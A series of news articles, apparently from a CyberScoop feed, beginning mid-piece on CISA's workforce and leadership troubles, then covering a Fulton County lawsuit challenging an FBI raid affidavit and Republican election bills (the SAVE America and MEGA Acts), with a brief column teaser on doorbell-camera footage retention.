“I don’t think he’s intentionally lying to us by saying there’s no reorg plan,” Garbarino said. “But there’s got to be some reasoning behind all these moves, moving the people around, or layoffs or whatever. I want to give him the benefit of the doubt that he is the technical guy that has been given a non-technical job to do.”

Schwartz and some others largely blame Congress for CISA’s current woes, since they haven’t approved Plankey as a full-time, permanent leader. “A lot of the issue is the fact that just doesn’t have the leadership to be able to participate in senior-level discussions,” he said.

What’s left to build on

Despite myriad complaints, many observers still see value in the current iteration of CISA. Some are hopeful about its ability to rebound, too.

CISA says it’s still devoted to its missions. The agency published a 2025 year-in-review about its accomplishments.

“CISA remains steadfast in its mission to safeguard the systems Americans rely on by strengthening federal network defenses, empowering businesses, and fortifying critical infrastructure nationwide,” Gottumukkala said in a statement to CyberScoop.

Moving forward, “we will deepen collaboration with trusted partners, prioritize highly skilled technical professionals, and direct resources for maximum impact—accelerating innovation, operational coordination, and workforce right-sizing to reduce long-term risks while maintaining strong industry partnerships and cost efficiency,” he said. “The CISA leadership and workforce remains committed to this mission despite a small minority who are upset that accountability and reform have come to the agency.”

It’s a message Gottumukkala recently delivered to Congress. “He tried to give the impression that we haven’t lost any capacity,” Thompson said. “I wasn’t impressed.”

Others said CISA is still carrying out many of its old tasks, such as issuing public alerts on vulnerabilities and threats.

“There’s still some good reporting coming out,” Greene said. “But what I can’t know is the volume of what they can put out versus what they used to be able to put out.”

Weiss said “CISA still has tremendous value in areas only the federal government can truly provide: national‑level visibility, cross‑sector coordination and the ability to marshal resources across agencies in a crisis.” But it’s not clear whether CISA can rise to the occasion like it did during the 2024 Change Healthcare crisis.

“All of this means it’s more important than ever for the private sector to take the initiative,” he said. “Critical infrastructure owners and operators cannot assume the federal government will have the capacity to step in the way it once did.”

Weiss and others also said that CISA has refocused on federal networks, but others, such as Lewis, said it’s also diminished there. “That’s their primary mission, and they don’t have the policies or the bodies to do that,” Lewis said.

Garbarino and a number of industry sources say they’re encouraged by the idea that the Trump administration could write less onerous regulations for CIRCIA, with an earlier draft drawing bipartisan and industry criticism.

A Senate-confirmed leader could further brighten the agency’s prospects, many agree. “They still have some good talent there. It’s not totally that we’ve lost everything there,” Schwartz said. “If you have leadership in there, then you can build it up.”

DiEmidio said some of the staff changes have made sense. Election security had more people than other sectors that needed the help, she said. 

“In some ways, I think the external attention to CISA’s mission in the media and with Congress was completely focused on one or two things, and the focus on the things that really matter, and the good work that CISA is doing got overshadowed,” she said. For the agency’s cybersecurity division and other cyber teams, “there were several incidents over the summer where those teams were incredible. They were working evenings, weekends.”

But many agree that rebuilding CISA’s workforce will be difficult.

The Trump administration has deliberately made working for the federal government challenging as a matter of policy. Russell Vought, head of the Office of Management and Budget, said before the election that the goal was to put federal workers “in trauma.” Morale at CISA has been particularly bad, they say. Periodic DHS shutdowns haven’t helped.

On the plus side for CISA, it’s a bad labor market, Lewis said.

Some of what CISA needs to do going forward is about managing expectations, said DiEmidio.

“What I would want to make sure is that CISA has a hiring plan in place to start hiring, especially in those key technical positions at all levels,” she said. “ I think you have to have an understanding that people are going to rotate in and out of government. Not everyone wants to stay in government long term and that’s okay.”

But there are some worries about CISA recruiting going forward. “Just the way they handle the departures, for a lot of folks, I don’t think it gives a lot of encouragement to individuals that ‘Hey, this is a great place to work,’” said one former DHS official.

The post Across party lines and industry, the verdict is the same: CISA is in trouble appeared first on CyberScoop.

ON SECURITY By Susan Bradley You’ve probably seen the chilling video by now — that masked man at the door in one of the highest-profile kidnappings in recent memory. But here’s something you may have missed, something many would consider equally chilling: the doorbell-camera footage was not configured to be kept! It was recovered by […]

A former federal official who tested and certified voting machines used in Fulton County, Georgia for the 2020 presidential election told a court that the federal government misrepresented key facts and omitted exculpatory public evidence while seeking a warrant in last month’s law enforcement raid.

The raid, carried out by the FBI and overseen by Director of National Intelligence Tulsi Gabbard, saw agents seize ballots and other documentation from the Fulton County election offices. A public affidavit cited five core allegations related to the county’s recordkeeping, electronic ballot image storage,  and election night reporting. Authorities allege these issues point to a potential conspiracy to intentionally manipulate the vote count in favor of Democrat Joe Biden.

Fulton County officials sued the federal government in response, arguing that the affidavit used to obtain a warrant for the raid “does not identify facts that establish probable cause that anyone committed a crime.”

Another filing includes sworn testimony from Ryan Macias, an elections expert who tested and certified the county’s voting machines while at the Election Assistance Commission. In his testimony, Macias told the court that the government’s key claims have already been investigated and have been found to be baseless.  

He said the FBI’s “many individual omissions and misstatements” in its affidavit reflect “gross mischaracterizations” of how elections work and directly contradict the conclusions of multiple prior investigations into the Nov. 2020 election in Fulton County.

“Once the statements and omissions in the Affidavit are corrected and based on my experience administering elections, the Affidavit does not have a substantial basis in reality,” Macias stated.

For instance, the FBI’s affidavit cites the absence of scanned images of all 527,925 ballots for the original count and recount. But Macias, who served as an adviser to Fulton County and witnessed pre and post-election operations in 2020, said this was standard practice.  Jurisdictions typically send only the vote count records from their machines on election night, because ballot images and audit logs are much larger files that can slow down the reporting process.

Macias also notes that the FBI affidavit omits that this issue was already investigated by Republican Secretary of State Brad Raffensperger, who found Georgia election workers weren’t required by law to preserve such images until a state law passed in 2021.

An investigator from Raffensperger’s office later told the Board of Elections that “it was “important to note that ballots can be scanned and tabulated without capturing ballot images,” while general counsel Charlene McGowan testified that ballot images play no role in the vote tabulation process and Fulton County’s paper ballots – counted three times – were the “most important” documents to verify the count.

“These explanations about the storing of ballot images have been publicly available for some time,” Macias noted.

Similarly, the FBI cites instances where some Fulton County ballots were scanned multiple times, claiming it shows evidence of “an intentional tabulation of ballots in a false matter” to make the recount and original vote counts match. The bureau also pointed to small, non-determinative differences between the county’s machine recount and totals from a hand-counted risk-limiting audit.

But the federal government again failed to mention in its petition for a warrant that these claims were “exhaustively” investigated by the Secretary of State’s office, which found the errors were benign, the duplicates weren’t counted, and did not impact the final vote count in the state’s count of the 2020 presidential contest.

According to Macias, the government’s affidavit also contains errors about basic facts about Fulton County’s reporting process. This includes misreporting the correct official vote count and the date and time it was transmitted to state officials for tabulation.

The post Fulton County lawsuit claims feds used ‘gross mischaracterizations’ to justify raid appeared first on CyberScoop.

Republicans in Congress are moving ahead with two pieces of legislation this week that would dramatically reshape the nation’s election laws.

Together, the SAVE America Act and MEGA Act would shift key voter certification powers to the executive branch,  require stricter proof of citizenship for voter registration, and allow states to more easily access federal immigration databases to track and remove “potential” or “suspected” noncitizens from voter rolls.

The SAVE America Act passed through the Rules Committee late Tuesday on a 9-4 partisan split, teeing up a full house vote on the bill. The bill would require voters to use a passport, birth certificate or REAL ID to register to vote and requires voters to prove their identity and citizenship in person.

Changes to the committee bill include a new section requiring states to send lists of all eligible voters to the Department of Homeland Security’s Systemic Alien Verification for Entitlements database and placing the Commissioner of the Social Security Administration at the head of a federal voter citizenship certification process.

Rep. Bryan Steil, R-Wis., said a manager’s amendment filed overnight would also exempt overseas military voters and their families from in-person identification requirements and make the law effective immediately.

Additionally on Tuesday, the House Committee on Administration held a hearing on another bill, the MEGA Act, also sponsored by Steil. That bill would discount all mail-in ballots received after the close of polls on Election Day, require the Attorney General to certify election funding for states, and authorize the AG to sue states that don’t comply with federal election requirements.

It would also allow private individuals to sue any election official “who registers an applicant to vote in an election for Federal office who fails to present documentary proof of United States citizenship.”

The data tells a different story

Steil cast counting ballots past Election Day as untrustworthy, comparing it to playing a corrupt card game.

“Imagine if you went to a casino and played cards and you’re playing with the dealer, and at the very end…the dealer says ‘You know what, I’m not going to flip over my cards for three or four days,’ ” he said. “You could be playing with the pope and you wouldn’t have a lot of confidence in exactly what is taking place.”

But the delays in counting ballots in three states in the 2020 election – Pennsylvania, Wisconsin and Michigan – had a clear explanation: state laws prevented election officials from processing mail-in ballots until Election Day or the day before, forcing them to prioritize in-person votes first before moving to mail-in ballots – which ended up leaning heavily Democratic.

New research from the Center for Election Integrity and Research released this week found that many claims of suspected noncitizen voting are wildly inflated when investigated. Executive director David Becker said the data gives “a very good sense of the depth of the problem” around noncitizen voting, which he called “infinitesimally rare.”

“President Trump’s own Department of Homeland Security has checked more than 49 million voter records, and they themselves admit that 99.98% of those records represented confirmed citizens,” Becker said in a statement. “In several states that are politically aligned with President Trump, the number of alleged noncitizen voters has precipitously dropped when subjected to scrutiny.”

 Congressional Democrats unanimously opposed the bills, arguing they would disenfranchise legal voters in an effort to address a problem that post-election audits show  is exceedingly rare.

Rep.  Julie Johnson, D-Texas, said Congress must respect “the fundamental constitutional right of every citizen to cast a ballot.” That obligation would affect citizens without birth certificates or passports married women who have changed their names, and voters with limited access to election offices where they must provide citizenship in person.

“The problem with this bill is you’re putting all these administrative burdens in place to keep citizens from voting,” she said, adding later that “it is unamerican, unconstitutional, and just dead ass wrong.”

A decade of finger pointing 

It’s not clear what authorities or figures Steil was citing to justify the bill. For instance, approximately 98 percent of voters already cast their ballot on voting machines with a paper backup record.

Further, election experts don’t say winners must be declared on Election Day. Many argue the opposite: that calling races too early—or refusing to count ballots legally postmarked on Election Day but take days to arrive-—can disenfranchise legitimate voters.

The MEGA Act has support from GOP-controlled states. Wyoming Secretary of State Chuck Gray told lawmakers Tuesday it would impose “baseline common sense standards” for elections nationwide. Gray also said he stood “in complete support of” President Trump’s March 2025 executive order on elections—though major sections of that order have since been struck down by courts for being unconstitutional. 

 After the 2016 election, Republicans resisted national election administration laws, arguing states should control election administration. 

Now, they face similar arguments about their legislative package.

Rep.  Jim McGovern, D-Mass., said it was “preposterous that the same Republicans who spent their entire careers demanding that states – not the federal government, states – should run their elections are now suddenly begging for federal intervention.”

Karen Brinson Bell, who led North Carolina’s State Board of Elections until last year, warned that the bill’s rigid photo ID mandates would override current systems even in most states—even those that already have voter ID laws. She also said the requirements would impose   a one-size-fits-all approach on election systems that have diverse, locally driven needs.

 “The needs of communities in Wyoming differ from those in Michigan and North Carolina,” Brinson Bell said. “Decentralized election administration is a feature, not a bug, of our democratic system.”

The post GOP Congress moves to shape election law in Trump’s image appeared first on CyberScoop.